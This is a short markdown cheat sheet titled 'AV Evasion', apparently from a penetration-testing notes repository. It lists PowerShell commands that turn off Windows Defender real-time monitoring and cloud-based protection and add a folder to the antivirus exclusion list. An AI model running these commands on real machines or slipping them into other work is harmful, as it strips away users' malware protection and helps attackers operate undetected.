Skip to content

Latest commit

 

History

History
9 lines (5 loc) · 241 Bytes

AV Evasion.md

File metadata and controls

9 lines (5 loc) · 241 Bytes

POWERSHELL

Set-MpPreference -DisableRealtimeMonitoring $true;
Disable Cloud-Based Protection;
Set-MpPreference -MAPSReporting Disable;

ADDING DIRECTORY TO AV EXCLUSION LIST: Set-MpPreference -ExclusionPath PATH\TO\FOLDER;